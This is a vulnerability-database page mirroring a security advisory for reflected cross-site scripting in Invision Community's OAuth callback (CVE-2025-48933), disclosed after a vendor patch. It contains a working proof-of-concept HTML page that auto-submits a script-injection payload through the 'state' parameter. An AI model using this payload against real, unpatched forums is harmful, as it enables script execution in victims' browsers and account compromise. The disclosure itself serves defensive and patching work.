Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Invision Community 5.0.7 Cross Site Scripting

🗓️ 23 Jul 2025 00:00:00Reported by EgiXType 
packetstorm
 packetstorm🔗 packetstorm.news👁 94 Views

Invision Community up to 5.0.7 and some 4.x before 4.7.21 have reflected XSS via state parameter.

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2025-48933
23 Jul 202510:13
circl
CVE		CVE-2025-48933
23 Jul 202510:13
cve
Positive Technologies		PT-2025-30555 · Invision Power Board · Invision Community
23 Jul 202500:00
ptsecurity
-----------------------------------------------------------------------------------------
    Invision Community <= 5.0.7 (oauth/callback) Reflected Cross-Site Scripting
    Vulnerability
    -----------------------------------------------------------------------------------------
    
    
    [-] Software Link:
    
    https://invisioncommunity.com
    
    
    [-] Affected Versions:
    
    Certain 4.x versions before 4.7.21.
    All 5.x versions before 5.0.8.
    
    
    [-] Vulnerability Description:
    
    User input passed through the "state" POST parameter to the
    /oauth/callback/index.php script is not properly sanitized before being
    used to generate HTML output. This can be exploited by attackers to perform
    Reflected Cross-Site Scripting (XSS) attacks.
    
    
    [-] Proof of Concept:
    
    The vulnerability can be exploited by tricking a victim user into opening
    an HTML page like the following:
    
    <html>
     <form method="POST">
      <input type="hidden" name="state" />
     </form>
     <script>
      var target = "https://invisioncommunity.com/forums/";
      var form = document.forms[0];
      form.action = target + "oauth/callback/index.php";
      form.childNodes[1].value = '1-' + btoa(target) + '-2-"><script>alert("XSS
    on "+document.domain)<\/script>';
      form.submit();
     </script>
    </html>
    
    
    [-] Solution:
    
    Upgrade to version 4.7.21, 5.0.8, or later.
    
    
    [-] Disclosure Timeline:
    
    [16/05/2025] - Vendor notified
    [27/05/2025] - Version 4.7.21 released
    [28/05/2025] - Version 5.0.8 released
    [28/05/2025] - CVE identifier requested
    [28/05/2025] - CVE identifier assigned
    [23/07/2025] - Public disclosure
    
    
    [-] CVE Reference:
    
    The Common Vulnerabilities and Exposures program (cve.org) has assigned the
    name CVE-2025-48933 to this vulnerability.
    
    
    [-] Credits:
    
    Vulnerability discovered by Egidio Romano.
    
    
    [-] Original Advisory:
    
    http://karmainsecurity.com/KIS-2025-05

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Jul 2025 00:00Current
6.4Medium risk
Vulners AI Score6.4
invision communitycross site scriptingoauth callbackstate parameterreflected attack
94